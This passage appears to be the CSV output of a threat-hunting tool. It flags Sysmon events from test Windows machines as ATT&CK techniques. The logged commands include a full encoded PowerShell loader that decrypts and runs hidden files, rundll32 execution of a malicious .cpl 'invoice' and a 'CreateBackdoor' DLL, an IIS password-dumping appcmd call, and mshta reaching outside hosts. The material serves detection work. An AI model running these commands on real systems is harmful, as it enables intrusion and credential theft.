oAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4864 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.503 + 747F3D96-60F5-5D3F-0000-0010A8D75500 + 4884 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4864 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.503 + 747F3D96-60F5-5D3F-0000-0010A8D75500 + 4884 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564434679.45431,2019-07-30T01:11:19.454310+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4864 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.503 + 747F3D96-60F5-5D3F-0000-0010A8D75500 + 4884 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1558452781.141798,2019-05-21T19:33:01.141798+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( aka112.inwitelecom.net ) , IP ( 105.73.6.112 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4131 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 06:58:40.518 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7..home + 49704 + + false + 105.73.6.112 + aka112.inwitelecom.net + 80 + http + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243532 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.985 + 747F3D96-9F68-5E75-0000-001079652000 + 3300 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243532 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.985 + 747F3D96-9F68-5E75-0000-001079652000 + 3300 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.192553,2020-03-21T09:00:25.192553+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243532 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.985 + 747F3D96-9F68-5E75-0000-001079652000 + 3300 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16391 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:37.063 + 365ABB72-20B1-5CD8-0000-001064D62400 + 1844 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16391 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:37.063 + 365ABB72-20B1-5CD8-0000-001064D62400 + 1844 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16391 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:37.063 + 365ABB72-20B1-5CD8-0000-001064D62400 + 1844 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.973148,2019-05-27T05:29:18.973148+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5943 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.933 + 365ABB72-3D6E-5CEB-0000-0010EFADFF00 + 2276 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969968.76308,2019-05-27T19:12:48.763080+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6184 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:48.644 + 365ABB72-FE70-5CEB-0000-0010385C0C00 + 2412 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436001.567754,2019-07-30T01:33:21.567754+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 93.184.220.29 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4908 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:33:19.687 + 747F3D96-661E-5D3F-0000-00107F248700 + 3164 + C:\Windows\System32\mshta.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49827 + + false + 93.184.220.29 + + 80 + http + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.445 + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-60F5-5D3F-0000-0010A7B65500 + 4996 + C:\Windows\System32\control.exe + "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1127] Trusted Developer Utilities,1558632368.94719,2019-05-23T21:26:08.947190+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( \\vboxsrv\HTools\msxsl.exe ) through command line ( msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1017 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 17:26:08.686 + 365ABB72-D7B0-5CE6-0000-001077C56D00 + 3388 + \\vboxsrv\HTools\msxsl.exe + 1.1.0.1 + msxsl + Command Line XSLT + Microsoft + msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat + D:\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8 + 365ABB72-D2D4-5CE6-0000-001047EA6400 + 2236 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1599760127.156198,2020-09-10T21:48:47.156198+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 380456 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + - + 2020-09-10 17:48:39.678 + 747F3D96-66F7-5F5A-0500-00000000F600 + 388 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\windows\system32\cmd.exe + c:\windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-66F8-5F5A-E703-000000000000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-66F4-5F5A-0300-00000000F600 + 300 + C:\Windows\System32\smss.exe + \SystemRoot\System32\smss.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.445 + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-60F5-5D3F-0000-0010A7B65500 + 4996 + C:\Windows\System32\control.exe + "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 